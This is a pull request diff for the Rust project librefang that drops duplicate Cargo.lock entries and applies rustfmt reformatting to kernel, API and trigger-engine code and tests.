### PR TITLE
fix(ci): restore main — rustfmt drift + 2 PR-only test failures

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -1748,17 +1748,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "delegate"
-version = "0.13.5"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "780eb241654bf097afb00fc5f054a09b687dad862e485fdcf8399bb056565370"
-dependencies = [
- "proc-macro2",
- "quote",
- "syn 2.0.117",
-]
-
-[[package]]
 name = "deltae"
 version = "0.3.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -4624,7 +4613,7 @@ dependencies = [
  "reqwest",
  "rusqlite",
  "russh",
- "russh-keys 0.49.2",
+ "russh-keys",
  "seccompiler",
  "serde",
  "serde_json",
@@ -5927,21 +5916,6 @@ checksum = "30d5b2194ed13191c1999ae0704b7839fb18384fa22e49b57eeaa97d79ce40da"
 dependencies = [
  "libc",
  "winapi",
-]
-
-[[package]]
-name = "pageant"
-version = "0.0.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "032d6201d2fb765158455ae0d5a510c016bb6da7232e5040e39e9c8db12b0afc"
-dependencies = [
- "bytes",
- "delegate",
- "futures",
- "rand 0.8.5",
- "thiserror 1.0.69",
- "tokio",
- "windows 0.58.0",
 ]
 
 [[package]]
@@ -7611,8 +7585,8 @@ dependencies = [
  "poly1305",
  "rand 0.8.5",
  "rand_core 0.6.4",
- "russh-cryptovec 0.7.3",
- "russh-keys 0.45.0",
+ "russh-cryptovec",
+ "russh-keys",
  "sha1",
  "sha2",
  "ssh-encoding",
@@ -7629,17 +7603,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "fadd2c0ab350e21c66556f94ee06f766d8bdae3213857ba7610bfd8e10e51880"
 dependencies = [
  "libc",
- "winapi",
-]
-
-[[package]]
-name = "russh-cryptovec"
-version = "0.48.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "4d8e7e854e1a87e4be00fa287c98cad23faa064d0464434beaa9f014ec3baa98"
-dependencies = [
- "libc",
- "ssh-encoding",
  "winapi",
 ]
 
@@ -7679,7 +7642,7 @@ dependencies = [
  "rand 0.8.5",
  "rand_core 0.6.4",
  "rsa",
- "russh-cryptovec 0.7.3",
+ "russh-cryptovec",
  "sec1",
  "serde",
  "sha1",
@@ -7692,74 +7655,6 @@ dependencies = [
  "tokio-stream",
  "typenum",
  "zeroize",
-]
-
-[[package]]
-name = "russh-keys"
-version = "0.49.2"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "788a2439ce385856585346beb37c48e7c9eb5de5f4f00736720a19ffdb3f5bb5"
-dependencies = [
- "aes",
- "async-trait",
- "bcrypt-pbkdf",
- "block-padding",
- "byteorder",
- "bytes",
- "cbc",
- "ctr",
- "data-encoding",
- "der",
- "digest",
- "ecdsa",
- "ed25519-dalek",
- "elliptic-curve",
- "futures",
- "getrandom 0.2.17",
- "hmac",
- "home",
- "inout",
- "log",
- "md5",
- "num-integer",
- "p256",
- "p384",
- "p521",
- "pageant",
- "pbkdf2 0.12.2",
- "pkcs1",
- "pkcs5",
- "pkcs8",
- "rand 0.8.5",
- "rand_core 0.6.4",
- "rsa",
- "russh-cryptovec 0.48.0",
- "russh-util",
- "sec1",
- "serde",
- "sha1",
- "sha2",
- "signature",
- "spki",
- "ssh-encoding",
- "ssh-key",
- "thiserror 1.0.69",
- "tokio",
- "tokio-stream",
- "typenum",
- "zeroize",
-]
-
-[[package]]
-name = "russh-util"
-version = "0.48.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "92c7dd577958c0cefbc8f8a2c05c48c88c42e2fdb760dbe9b96ae31d4de97a1f"
-dependencies = [
- "chrono",
- "tokio",
- "wasm-bindgen",
- "wasm-bindgen-futures",
 ]
 
 [[package]]
@@ -8716,7 +8611,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "eb9242b9ef4108a78e8cd1a2c98e193ef372437f8c22be363075233321dd4a15"
 dependencies = [
  "base64ct",
- "bytes",
  "pem-rfc7468",
  "sha2",
 ]
@@ -9749,7 +9643,6 @@ dependencies = [
  "futures-core",
  "pin-project-lite",
  "tokio",
- "tokio-util",
 ]
 
 [[package]]
@@ -11154,8 +11047,8 @@ dependencies = [
  "webview2-com-sys",
  "windows 0.61.3",
  "windows-core 0.61.2",
- "windows-implement 0.60.2",
- "windows-interface 0.59.3",
+ "windows-implement",
+ "windows-interface",
 ]
 
 [[package]]
@@ -11325,16 +11218,6 @@ dependencies = [
 
 [[package]]
 name = "windows"
-version = "0.58.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "dd04d41d93c4992d421894c18c8b43496aa748dd4c081bac0dc93eb0489272b6"
-dependencies = [
- "windows-core 0.58.0",
- "windows-targets 0.52.6",
-]
-
-[[package]]
-name = "windows"
 version = "0.61.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "9babd3a767a4c1aef6900409f85f5d53ce2544ccdfaa86dad48c91782c6d6893"
@@ -11378,25 +11261,12 @@ dependencies = [
 
 [[package]]
 name = "windows-core"
-version = "0.58.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6ba6d44ec8c2591c134257ce647b7ea6b20335bf6379a27dac5f1641fcf59f99"
-dependencies = [
- "windows-implement 0.58.0",
- "windows-interface 0.58.0",
- "windows-result 0.2.0",
- "windows-strings 0.1.0",
- "windows-targets 0.52.6",
-]
-
-[[package]]
-name = "windows-core"
 version = "0.61.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c0fdd3ddb90610c7638aa2b3a3ab2904fb9e5cdbecc643ddb3647212781c4ae3"
 dependencies = [
- "windows-implement 0.60.2",
- "windows-interface 0.59.3",
+ "windows-implement",
+ "windows-interface",
  "windows-link 0.1.3",
  "windows-result 0.3.4",
  "windows-strings 0.4.2",
@@ -11408,8 +11278,8 @@ version = "0.62.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb"
 dependencies = [
- "windows-implement 0.60.2",
- "windows-interface 0.59.3",
+ "windows-implement",
+ "windows-interface",
  "windows-link 0.2.1",
  "windows-result 0.4.1",
  "windows-strings 0.5.1",
@@ -11439,31 +11309,9 @@ dependencies = [
 
 [[package]]
 name = "windows-implement"
-version = "0.58.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2bbd5b46c938e506ecbce286b6628a02171d56153ba733b6c741fc627ec9579b"
-dependencies = [
- "proc-macro2",
- "quote",
- "syn 2.0.117",
-]
-
-[[package]]
-name = "windows-implement"
 version = "0.60.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "053e2e040ab57b9dc951b72c264860db7eb3b0200ba345b4e4c3b14f67855ddf"
-dependencies = [
- "proc-macro2",
- "quote",
- "syn 2.0.117",
-]
-
-[[package]]
-name = "windows-interface"
-version = "0.58.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "053c4c462dc91d3b1504c6fe5a726dd15e216ba718e84a0e46a88fbe5ded3515"
 dependencies = [
  "proc-macro2",
  "quote",
@@ -11515,15 +11363,6 @@ dependencies = [
 
 [[package]]
 name = "windows-result"
-version = "0.2.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1d1043d8214f791817bab27572aaa8af63732e11bf84aa21a45a78d6c317ae0e"
-dependencies = [
- "windows-targets 0.52.6",
-]
-
-[[package]]
-name = "windows-result"
 version = "0.3.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "56f42bd332cc6c8eac5af113fc0c1fd6a8fd2aa08a0119358686e5160d0586c6"
@@ -11538,16 +11377,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "7781fa89eaf60850ac3d2da7af8e5242a5ea78d1a11c49bf2910bb5a73853eb5"
 dependencies = [
  "windows-link 0.2.1",
-]
-
-[[package]]
-name = "windows-strings"
-version = "0.1.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "4cd9b125c486025df0eabcb585e62173c6c9eddcec5d117d3b6e8c30e2ee4d10"
-dependencies = [
- "windows-result 0.2.0",
- "windows-targets 0.52.6",
 ]
 
 [[package]]

--- a/crates/librefang-api/src/channel_bridge.rs
+++ b/crates/librefang-api/src/channel_bridge.rs
@@ -1229,21 +1229,22 @@ impl ChannelBridgeHandle for KernelBridgeAdapter {
             }
         };
 
-        let trigger_id = match self
-            .kernel
-            .trigger_engine()
-            .register(agent.id, pattern, prompt.to_string(), 0)
-        {
-            Ok(id) => id,
-            Err(e) => {
-                // Per-agent cap exceeded (audit:
-                // trigger-engine-no-per-agent-cap). Surface as a
-                // human-readable line back to the channel sender so
-                // they know the bridge isn't broken — they hit the
-                // ceiling.
-                return format!("Trigger registration refused: {e}");
-            }
-        };
+        let trigger_id =
+            match self
+                .kernel
+                .trigger_engine()
+                .register(agent.id, pattern, prompt.to_string(), 0)
+            {
+                Ok(id) => id,
+                Err(e) => {
+                    // Per-agent cap exceeded (audit:
+                    // trigger-engine-no-per-agent-cap). Surface as a
+                    // human-readable line back to the channel sender so
+                    // they know the bridge isn't broken — they hit the
+                    // ceiling.
+                    return format!("Trigger registration refused: {e}");
+                }
+            };
         let id_str = trigger_id.0.to_string();
         let id_short = safe_truncate_str(&id_str, 8);
         format!("Trigger created [{id_short}] for agent '{agent_name}'.")

--- a/crates/librefang-api/src/types.rs
+++ b/crates/librefang-api/src/types.rs
@@ -1017,7 +1017,11 @@ mod tests {
         let big = (0..(PAGINATION_MAX_LIMIT + 50)).collect::<Vec<_>>();
         let (items, total, _, limit) = q.paginate(big);
         assert_eq!(items.len(), PAGINATION_MAX_LIMIT);
-        assert_eq!(total, PAGINATION_MAX_LIMIT + 50, "total reflects the unclipped row count");
+        assert_eq!(
+            total,
+            PAGINATION_MAX_LIMIT + 50,
+            "total reflects the unclipped row count"
+        );
         assert_eq!(limit, Some(PAGINATION_MAX_LIMIT));
     }
 

--- a/crates/librefang-api/tests/auth_public_allowlist.rs
+++ b/crates/librefang-api/tests/auth_public_allowlist.rs
@@ -228,10 +228,7 @@ const REGISTERED_GET_ROUTES: &[RouteEntry] = &[
     // pop-under to hijack GITHUB_TOKEN via localhost (audit:
     // github-copilot-oauth-unauthenticated). The dashboard already
     // authenticates before initiating the device flow.
-    re(
-        "/api/providers/github-copilot/oauth/start",
-        Expect::Authed,
-    ),
+    re("/api/providers/github-copilot/oauth/start", Expect::Authed),
     re(
         "/api/providers/github-copilot/oauth/poll/abc123",
         Expect::Authed,

--- a/crates/librefang-kernel-router/src/lib.rs
+++ b/crates/librefang-kernel-router/src/lib.rs
@@ -1877,7 +1877,10 @@ system_prompt = "override"
         // not a behavioural one. Re-fetching pays a compile cost
         // but the match result is identical.
         let mut cache = RegexCache::new();
-        let matches_before = cache.get_or_compile("hello").unwrap().is_match("hello world");
+        let matches_before = cache
+            .get_or_compile("hello")
+            .unwrap()
+            .is_match("hello world");
         assert!(matches_before);
         // Flood the cache so "hello" gets evicted.
         for i in 0..(MAX_REGEX_CACHE_ENTRIES + 1) {
@@ -1885,8 +1888,14 @@ system_prompt = "override"
         }
         assert!(!cache.entries.contains_key("hello"));
         // Re-fetch — must compile fresh and still match.
-        let matches_after = cache.get_or_compile("hello").unwrap().is_match("hello world");
-        assert!(matches_after, "match outcome must survive an eviction round-trip");
+        let matches_after = cache
+            .get_or_compile("hello")
+            .unwrap()
+            .is_match("hello world");
+        assert!(
+            matches_after,
+            "match outcome must survive an eviction round-trip"
+        );
     }
 
     #[test]

--- a/crates/librefang-kernel/src/kernel/agent_execution.rs
+++ b/crates/librefang-kernel/src/kernel/agent_execution.rs
@@ -32,10 +32,7 @@ use crate::MeteringSubsystemApi;
 ///   `message.trim()`.
 ///
 /// Audit: silent-marker-substring-match.
-pub(crate) fn strip_silent_cron_marker(
-    message: &str,
-    is_internal_cron: bool,
-) -> (String, bool) {
+pub(crate) fn strip_silent_cron_marker(message: &str, is_internal_cron: bool) -> (String, bool) {
     let is_silent = is_internal_cron && message.trim_start().starts_with("[SILENT]");
     if !is_silent {
         return (message.trim().to_string(), false);
@@ -932,8 +929,7 @@ impl LibreFangKernel {
         // the literal `[SILENT]` substring (audit:
         // silent-marker-substring-match).
         let is_internal_cron = sender_context.is_some_and(|ctx| ctx.is_internal_cron);
-        let (message_for_llm, is_silent_cron) =
-            strip_silent_cron_marker(message, is_internal_cron);
+        let (message_for_llm, is_silent_cron) = strip_silent_cron_marker(message, is_internal_cron);
 
         // Build link context from user message (auto-extract URLs for the agent)
         let message_with_links = if let Some(link_ctx) =
@@ -1374,8 +1370,7 @@ mod silent_marker_tests {
 
     #[test]
     fn cron_call_strips_leading_marker_and_trims() {
-        let (out, silent) =
-            strip_silent_cron_marker("[SILENT]   run housekeeping  ", true);
+        let (out, silent) = strip_silent_cron_marker("[SILENT]   run housekeeping  ", true);
         assert_eq!(out, "run housekeeping");
         assert!(silent);
     }
@@ -1408,10 +1403,8 @@ mod silent_marker_tests {
         // With the prefix anchor the message reaches the LLM intact
         // and the silent flag stays off — the operator must place
         // the marker at the start to opt in.
-        let (out, silent) = strip_silent_cron_marker(
-            "Channel said: [SILENT] mode unrelated note",
-            true,
-        );
+        let (out, silent) =
+            strip_silent_cron_marker("Channel said: [SILENT] mode unrelated note", true);
         assert_eq!(out, "Channel said: [SILENT] mode unrelated note");
         assert!(!silent);
     }
@@ -1421,10 +1414,8 @@ mod silent_marker_tests {
         // The previous implementation used `replace("[SILENT]", "")`
         // which scrubbed every occurrence. Now only the leading one
         // is consumed; later occurrences (if any) survive intact.
-        let (out, silent) = strip_silent_cron_marker(
-            "[SILENT] note: keep this [SILENT] tag literal",
-            true,
-        );
+        let (out, silent) =
+            strip_silent_cron_marker("[SILENT] note: keep this [SILENT] tag literal", true);
         assert_eq!(out, "note: keep this [SILENT] tag literal");
         assert!(silent);
     }

--- a/crates/librefang-kernel/src/kernel/pooled_driver.rs
+++ b/crates/librefang-kernel/src/kernel/pooled_driver.rs
@@ -144,10 +144,7 @@ impl LlmDriver for PooledDriver {
 
         // Only rate-limit is rotate-worthy here. Anything else uses
         // the existing classification + propagation policy.
-        if !matches!(
-            first_err.failover_reason(),
-            FailoverReason::RateLimit(_)
-        ) {
+        if !matches!(first_err.failover_reason(), FailoverReason::RateLimit(_)) {
             self.handle_driver_error(&api_key, &first_err);
             return Err(first_err);
         }

--- a/crates/librefang-kernel/src/kernel/spawn.rs
+++ b/crates/librefang-kernel/src/kernel/spawn.rs
@@ -427,10 +427,10 @@ impl LibreFangKernel {
                     // when the agent has already hit its trigger
                     // budget; log + skip rather than failing the
                     // spawn. (audit: trigger-engine-no-per-agent-cap)
-                    if let Err(e) =
-                        self.workflows
-                            .triggers
-                            .register(agent_id, pattern, prompt, 0)
+                    if let Err(e) = self
+                        .workflows
+                        .triggers
+                        .register(agent_id, pattern, prompt, 0)
                     {
                         warn!(
                             agent = %name,

--- a/crates/librefang-kernel/src/skill_workshop/llm_review.rs
+++ b/crates/librefang-kernel/src/skill_workshop/llm_review.rs
@@ -335,11 +335,11 @@ mod tests {
 
     #[async_trait]
     impl LlmDriver for ResponseFormatRecordingDriver {
-        async fn complete(
-            &self,
-            req: CompletionRequest,
-        ) -> Result<CompletionResponse, LlmError> {
-            self.observed.lock().unwrap().push(req.response_format.clone());
+        async fn complete(&self, req: CompletionRequest) -> Result<CompletionResponse, LlmError> {
+            self.observed
+                .lock()
+                .unwrap()
+                .push(req.response_format.clone());
             Ok(CompletionResponse {
                 content: vec![ContentBlock::Text {
                     text: r#"{"accept": true, "reason": "ok"}"#.to_string(),

--- a/crates/librefang-kernel/src/triggers.rs
+++ b/crates/librefang-kernel/src/triggers.rs
@@ -1477,12 +1477,14 @@ mod tests {
     fn test_register_trigger() {
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        let id = engine.register(
-            agent_id,
-            TriggerPattern::All,
-            "Event occurred: {{event}}".to_string(),
-            0,
-        ).unwrap();
+        let id = engine
+            .register(
+                agent_id,
+                TriggerPattern::All,
+                "Event occurred: {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
         assert!(engine.get(id).is_some());
     }
 
@@ -1490,12 +1492,14 @@ mod tests {
     fn test_evaluate_lifecycle() {
         let engine = TriggerEngine::new();
         let watcher = AgentId::new();
-        engine.register(
-            watcher,
-            TriggerPattern::Lifecycle,
-            "Lifecycle: {{event}}".to_string(),
-            0,
-        ).unwrap();
+        engine
+            .register(
+                watcher,
+                TriggerPattern::Lifecycle,
+                "Lifecycle: {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         let event = Event::new(
             AgentId::new(),
@@ -1516,14 +1520,16 @@ mod tests {
     fn test_evaluate_agent_spawned_pattern() {
         let engine = TriggerEngine::new();
         let watcher = AgentId::new();
-        engine.register(
-            watcher,
-            TriggerPattern::AgentSpawned {
-                name_pattern: "coder".to_string(),
-            },
-            "Coder spawned: {{event}}".to_string(),
-            0,
-        ).unwrap();
+        engine
+            .register(
+                watcher,
+                TriggerPattern::AgentSpawned {
+                    name_pattern: "coder".to_string(),
+                },
+                "Coder spawned: {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         // This should match
         let event = Event::new(
@@ -1552,12 +1558,14 @@ mod tests {
     fn test_max_fires() {
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        let tid = engine.register(
-            agent_id,
-            TriggerPattern::All,
-            "Event: {{event}}".to_string(),
-            2, // max 2 fires
-        ).unwrap();
+        let tid = engine
+            .register(
+                agent_id,
+                TriggerPattern::All,
+                "Event: {{event}}".to_string(),
+                2, // max 2 fires
+            )
+            .unwrap();
         // Disable cooldown so we can fire rapidly in the test.
         engine.triggers.get_mut(&tid).unwrap().cooldown_secs = Some(0);
 
@@ -1580,7 +1588,9 @@ mod tests {
     fn test_remove_trigger() {
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        let id = engine.register(agent_id, TriggerPattern::All, "msg".to_string(), 0).unwrap();
+        let id = engine
+            .register(agent_id, TriggerPattern::All, "msg".to_string(), 0)
+            .unwrap();
         assert!(engine.remove(id));
         assert!(engine.get(id).is_none());
     }
@@ -1589,8 +1599,12 @@ mod tests {
     fn test_remove_agent_triggers() {
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        engine.register(agent_id, TriggerPattern::All, "a".to_string(), 0).unwrap();
-        engine.register(agent_id, TriggerPattern::System, "b".to_string(), 0).unwrap();
+        engine
+            .register(agent_id, TriggerPattern::All, "a".to_string(), 0)
+            .unwrap();
+        engine
+            .register(agent_id, TriggerPattern::System, "b".to_string(), 0)
+            .unwrap();
         assert_eq!(engine.list_agent_triggers(agent_id).len(), 2);
 
         engine.remove_agent_triggers(agent_id);
@@ -1601,14 +1615,16 @@ mod tests {
     fn test_content_match() {
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        engine.register(
-            agent_id,
-            TriggerPattern::ContentMatch {
-                substring: "quota".to_string(),
-            },
-            "Alert: {{event}}".to_string(),
-            0,
-        ).unwrap();
+        engine
+            .register(
+                agent_id,
+                TriggerPattern::ContentMatch {
+                    substring: "quota".to_string(),
+                },
+                "Alert: {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         let event = Event::new(
             AgentId::new(),
@@ -1629,8 +1645,12 @@ mod tests {
         let engine = TriggerEngine::new();
         let old_agent = AgentId::new();
         let new_agent = AgentId::new();
-        engine.register(old_agent, TriggerPattern::All, "a".to_string(), 0).unwrap();
-        engine.register(old_agent, TriggerPattern::System, "b".to_string(), 0).unwrap();
+        engine
+            .register(old_agent, TriggerPattern::All, "a".to_string(), 0)
+            .unwrap();
+        engine
+            .register(old_agent, TriggerPattern::System, "b".to_string(), 0)
+            .unwrap();
 
         let count = engine.reassign_agent_triggers(old_agent, new_agent);
         assert_eq!(count, 2);
@@ -1654,7 +1674,9 @@ mod tests {
     fn test_reassign_agent_triggers_no_match_returns_zero() {
         let engine = TriggerEngine::new();
         let agent_a = AgentId::new();
-        engine.register(agent_a, TriggerPattern::All, "a".to_string(), 0).unwrap();
+        engine
+            .register(agent_a, TriggerPattern::All, "a".to_string(), 0)
+            .unwrap();
 
         let count = engine.reassign_agent_triggers(AgentId::new(), AgentId::new());
         assert_eq!(count, 0);
@@ -1668,8 +1690,12 @@ mod tests {
         let agent_a = AgentId::new();
         let agent_b = AgentId::new();
         let agent_c = AgentId::new();
-        engine.register(agent_a, TriggerPattern::All, "a".to_string(), 0).unwrap();
-        engine.register(agent_b, TriggerPattern::System, "b".to_string(), 0).unwrap();
+        engine
+            .register(agent_a, TriggerPattern::All, "a".to_string(), 0)
+            .unwrap();
+        engine
+            .register(agent_b, TriggerPattern::System, "b".to_string(), 0)
+            .unwrap();
 
         let count = engine.reassign_agent_triggers(agent_a, agent_c);
         assert_eq!(count, 1);
@@ -1685,15 +1711,19 @@ mod tests {
         let engine = TriggerEngine::new();
         let old_agent = AgentId::new();
         let new_agent = AgentId::new();
-        engine.register(
-            old_agent,
-            TriggerPattern::ContentMatch {
-                substring: "deploy".to_string(),
-            },
-            "Deploy alert: {{event}}".to_string(),
-            5,
-        ).unwrap();
-        engine.register(old_agent, TriggerPattern::Lifecycle, "lc".to_string(), 0).unwrap();
+        engine
+            .register(
+                old_agent,
+                TriggerPattern::ContentMatch {
+                    substring: "deploy".to_string(),
+                },
+                "Deploy alert: {{event}}".to_string(),
+                5,
+            )
+            .unwrap();
+        engine
+            .register(old_agent, TriggerPattern::Lifecycle, "lc".to_string(), 0)
+            .unwrap();
 
         // Take triggers — engine should be empty for old agent
         let taken = engine.take_agent_triggers(old_agent);
@@ -1730,7 +1760,9 @@ mod tests {
         let engine = TriggerEngine::new();
         let old_agent = AgentId::new();
         let new_agent = AgentId::new();
-        let tid = engine.register(old_agent, TriggerPattern::All, "a".to_string(), 0).unwrap();
+        let tid = engine
+            .register(old_agent, TriggerPattern::All, "a".to_string(), 0)
+            .unwrap();
         engine.set_enabled(tid, false);
 
         let taken = engine.take_agent_triggers(old_agent);
@@ -1752,12 +1784,14 @@ mod tests {
     fn test_evaluate_no_target_wakes_owner() {
         let engine = TriggerEngine::new();
         let owner = AgentId::new();
-        engine.register(
-            owner,
-            TriggerPattern::All,
-            "Event: {{event}}".to_string(),
-            0,
-        ).unwrap();
+        engine
+            .register(
+                owner,
+                TriggerPattern::All,
+                "Event: {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         let event = Event::new(
             AgentId::new(),
@@ -1779,16 +1813,18 @@ mod tests {
         let engine = TriggerEngine::new();
         let owner = AgentId::new();
         let target = AgentId::new();
-        engine.register_with_target(
-            owner,
-            TriggerPattern::All,
-            "Cross-wake: {{event}}".to_string(),
-            0,
-            Some(target),
-            None,
-            None,
-            None,
-        ).unwrap();
+        engine
+            .register_with_target(
+                owner,
+                TriggerPattern::All,
+                "Cross-wake: {{event}}".to_string(),
+                0,
+                Some(target),
+                None,
+                None,
+                None,
+            )
+            .unwrap();
 
         let event = Event::new(
             AgentId::new(),
@@ -1811,14 +1847,16 @@ mod tests {
         let engine = TriggerEngine::new();
         let owner = AgentId::new();
         let target = AgentId::new();
-        let tid = engine.register_cross_agent_trigger(
-            owner,
-            target,
-            TriggerPattern::AgentSpawned {
-                name_pattern: "worker".to_string(),
-            },
-            "Worker spawned: {{event}}".to_string(),
-        ).unwrap();
+        let tid = engine
+            .register_cross_agent_trigger(
+                owner,
+                target,
+                TriggerPattern::AgentSpawned {
+                    name_pattern: "worker".to_string(),
+                },
+                "Worker spawned: {{event}}".to_string(),
+            )
+            .unwrap();
 
         let trigger = engine.get(tid).unwrap();
         assert_eq!(trigger.agent_id, owner);
@@ -1846,16 +1884,18 @@ mod tests {
         let target = AgentId::new();
         let new_owner = AgentId::new();
 
-        engine.register_with_target(
-            old_owner,
-            TriggerPattern::System,
-            "sys: {{event}}".to_string(),
-            0,
-            Some(target),
-            None,
-            None,
-            None,
-        ).unwrap();
+        engine
+            .register_with_target(
+                old_owner,
+                TriggerPattern::System,
+                "sys: {{event}}".to_string(),
+                0,
+                Some(target),
+                None,
+                None,
+                None,
+            )
+            .unwrap();
 
         let taken = engine.take_agent_triggers(old_owner);
         assert_eq!(taken.len(), 1);
@@ -1878,12 +1918,14 @@ mod tests {
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
         // Register trigger with default cooldown (5s)
-        engine.register(
-            agent_id,
-            TriggerPattern::All,
-            "Event: {{event}}".to_string(),
-            0,
-        ).unwrap();
+        engine
+            .register(
+                agent_id,
+                TriggerPattern::All,
+                "Event: {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         let event = Event::new(
             AgentId::new(),
@@ -1907,12 +1949,14 @@ mod tests {
     fn test_cooldown_unwedges_on_future_last_fired_at() {
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        let tid = engine.register(
-            agent_id,
-            TriggerPattern::All,
-            "Event: {{event}}".to_string(),
-            0,
-        ).unwrap();
+        let tid = engine
+            .register(
+                agent_id,
+                TriggerPattern::All,
+                "Event: {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         // Simulate a future-dated `last_fired_at` — far enough ahead that
         // the bug's `unwrap_or(Duration::ZERO)` path would suppress every
@@ -1951,12 +1995,14 @@ mod tests {
     fn test_zero_cooldown_allows_rapid_refire() {
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        let tid = engine.register(
-            agent_id,
-            TriggerPattern::All,
-            "Event: {{event}}".to_string(),
-            0,
-        ).unwrap();
+        let tid = engine
+            .register(
+                agent_id,
+                TriggerPattern::All,
+                "Event: {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
         // Explicitly disable cooldown
         engine.triggers.get_mut(&tid).unwrap().cooldown_secs = Some(0);
 
@@ -1981,12 +2027,14 @@ mod tests {
 
         // Register 5 triggers — all match All pattern
         for agent_id in &agents {
-            let tid = engine.register(
-                *agent_id,
-                TriggerPattern::All,
-                "Event: {{event}}".to_string(),
-                0,
-            ).unwrap();
+            let tid = engine
+                .register(
+                    *agent_id,
+                    TriggerPattern::All,
+                    "Event: {{event}}".to_string(),
+                    0,
+                )
+                .unwrap();
             // Disable cooldown so all are eligible
             engine.triggers.get_mut(&tid).unwrap().cooldown_secs = Some(0);
         }
@@ -2008,12 +2056,14 @@ mod tests {
     fn test_cooldown_clears_on_remove() {
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        let tid = engine.register(
-            agent_id,
-            TriggerPattern::All,
-            "Event: {{event}}".to_string(),
-            0,
-        ).unwrap();
+        let tid = engine
+            .register(
+                agent_id,
+                TriggerPattern::All,
+                "Event: {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         let event = Event::new(
             AgentId::new(),
@@ -2037,7 +2087,9 @@ mod tests {
         let engine = TriggerEngine::new();
         let old_agent = AgentId::new();
         let new_agent = AgentId::new();
-        let tid = engine.register(old_agent, TriggerPattern::All, "a".to_string(), 0).unwrap();
+        let tid = engine
+            .register(old_agent, TriggerPattern::All, "a".to_string(), 0)
+            .unwrap();
         engine.triggers.get_mut(&tid).unwrap().cooldown_secs = Some(30);
 
         let taken = engine.take_agent_triggers(old_agent);
@@ -2108,14 +2160,16 @@ mod tests {
     fn test_content_match_on_custom_json_event() {
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        engine.register(
-            agent_id,
-            TriggerPattern::ContentMatch {
-                substring: "deploy".to_string(),
-            },
-            "Deploy alert: {{event}}".to_string(),
-            0,
-        ).unwrap();
+        engine
+            .register(
+                agent_id,
+                TriggerPattern::ContentMatch {
+                    substring: "deploy".to_string(),
+                },
+                "Deploy alert: {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         let payload =
             serde_json::to_vec(&serde_json::json!({"type": "deploy", "data": {"env": "prod"}}))
@@ -2139,12 +2193,14 @@ mod tests {
     fn test_memory_update_trigger_fires() {
         let engine = TriggerEngine::new();
         let watcher = AgentId::new();
-        engine.register(
-            watcher,
-            TriggerPattern::MemoryUpdate,
-            "Memory changed: {{event}}".to_string(),
-            0,
-        ).unwrap();
+        engine
+            .register(
+                watcher,
+                TriggerPattern::MemoryUpdate,
+                "Memory changed: {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         let event = Event::new(
             AgentId::new(),
@@ -2164,14 +2220,16 @@ mod tests {
     fn test_memory_key_pattern_trigger_fires() {
         let engine = TriggerEngine::new();
         let watcher = AgentId::new();
-        engine.register(
-            watcher,
-            TriggerPattern::MemoryKeyPattern {
-                key_pattern: "user.".to_string(),
-            },
-            "User memory changed: {{event}}".to_string(),
-            0,
-        ).unwrap();
+        engine
+            .register(
+                watcher,
+                TriggerPattern::MemoryKeyPattern {
+                    key_pattern: "user.".to_string(),
+                },
+                "User memory changed: {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         // Should match
         let event = Event::new(
@@ -2210,14 +2268,16 @@ mod tests {
         let worker = AgentId::new();
         let delegator = AgentId::new();
 
-        engine.register(
-            worker,
-            TriggerPattern::TaskPosted {
-                assignee_match: Some("self".to_string()),
-            },
-            "claim and work on {{event}}".to_string(),
-            0,
-        ).unwrap();
+        engine
+            .register(
+                worker,
+                TriggerPattern::TaskPosted {
+                    assignee_match: Some("self".to_string()),
+                },
+                "claim and work on {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         // A task assigned to the delegator must NOT match.
         let event_other = Event::new(
@@ -2306,16 +2366,18 @@ mod tests {
 
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        let tid = engine.register_with_target(
-            agent_id,
-            TriggerPattern::All,
